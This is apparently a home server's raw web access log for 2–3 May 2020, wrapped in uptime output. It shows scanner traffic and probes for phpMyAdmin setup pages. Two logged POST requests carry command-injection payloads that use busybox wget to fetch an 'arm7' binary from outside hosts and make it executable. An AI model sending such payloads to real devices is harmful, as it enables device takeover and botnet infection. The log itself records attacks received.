Sat May 2 06:25:07 MDT 2020 06:25:07 up 67 days, 10:53, 1 user, load average: 0.32, 0.27, 0.26 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 67days 1:23m 2.65s /usr/bin/lxsession -s LXDE-pi -e LXDE 151.73.218.167 - - [02/May/2020:12:37:37 +0000] "GET / HTTP/1.1" 400 0 "" "" 109.111.153.189 - - [02/May/2020:12:51:15 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 43.230.113.181 - - [02/May/2020:13:06:15 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 186.195.24.106 - - [02/May/2020:13:09:45 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 41.190.70.194 - - [02/May/2020:13:11:23 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 87.20.91.68 - - [02/May/2020:13:38:28 +0000] "GET / HTTP/1.1" 400 0 "" "" 179.110.30.78 - - [02/May/2020:15:52:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 83.34.162.179 - - [02/May/2020:17:29:16 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 81.15.175.148 - - [02/May/2020:18:23:47 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 162.243.138.241 - - [02/May/2020:18:26:29 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 45.71.230.2 - - [02/May/2020:19:54:31 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 191.17.182.243 - - [02/May/2020:20:47:41 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 196.202.182.210 - - [02/May/2020:20:49:04 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 13.68.186.14 - - [02/May/2020:21:01:24 +0000] "GET /muieblackcat HTTP/1.1" 404 0 "" "" 13.68.186.14 - - [02/May/2020:21:01:24 +0000] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 13.68.186.14 - - [02/May/2020:21:01:24 +0000] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 13.68.186.14 - - [02/May/2020:21:01:24 +0000] "GET //pma/scripts/setup.php HTTP/1.1" 400 0 "" "" 13.68.186.14 - - [02/May/2020:21:01:24 +0000] "GET //myadmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 13.68.186.14 - - [02/May/2020:21:01:25 +0000] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 13.68.186.14 - - [02/May/2020:21:01:25 +0000] "GET //Admin/scripts/setup.php HTTP/1.1" 400 0 "" "" 45.238.244.8 - - [02/May/2020:23:11:11 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 45.238.244.8 - - [02/May/2020:23:11:11 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 83.34.162.179 - - [02/May/2020:23:14:06 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 162.243.139.197 - - [02/May/2020:23:41:38 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 91.204.179.180 - - [03/May/2020:00:10:01 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 113.188.237.131 - - [03/May/2020:00:59:56 +0000] "GET / HTTP/1.1" 400 0 "" "" 183.238.3.28 - - [03/May/2020:01:33:59 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" "" 183.238.3.28 - - [03/May/2020:01:33:59 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 83.97.20.21 - - [03/May/2020:02:23:07 +0000] "GET / HTTP/1.0" 200 25000 "" "" 201.143.218.7 - - [03/May/2020:03:29:54 +0000] "GET / HTTP/1.1" 400 0 "" "" 201.143.218.7 - - [03/May/2020:03:29:55 +0000] "GET / HTTP/1.1" 400 0 "" "" 172.104.108.109 - - [03/May/2020:03:33:12 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0" 103.47.216.245 - - [03/May/2020:03:52:36 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 43.252.9.180 - - [03/May/2020:04:30:48 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 125.94.213.8 - - [03/May/2020:04:40:11 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 125.94.213.8 - - [03/May/2020:04:40:13 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 125.94.213.8 - - [03/May/2020:04:40:16 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 125.94.213.8 - - [03/May/2020:04:40:19 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 45.167.158.123 - - [03/May/2020:05:54:10 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" "" 45.167.158.123 - - [03/May/2020:05:54:10 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 200.232.172.8 - - [03/May/2020:07:44:39 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 201.49.231.147 - - [03/May/2020:08:25:06 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 223.94.89.20 - - [03/May/2020:09:02:57 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 185.216.140.6 - - [03/May/2020:10:00:36 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 123.28.52.102 - - [03/May/2020:10:05:31 +0000] "GET / HTTP/1.1" 400 0 "" "" 200.233.140.65 - - [03/May/2020:10:24:02 +0000] "GET / HTTP/1.1" 400 0 "" "" 46.177.173.169 - - [03/May/2020:10:53:46 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 162.243.137.140 - - [03/May/2020:11:23:47 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" Sun May 3 06:25:11 MDT 2020 06:25:11 up 68 days, 10:53, 1 user, load average: 0.54, 0.32, 0.29 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 68days 1:24m 2.65s /usr/bin/lxsession -s LXDE-pi -e LXDE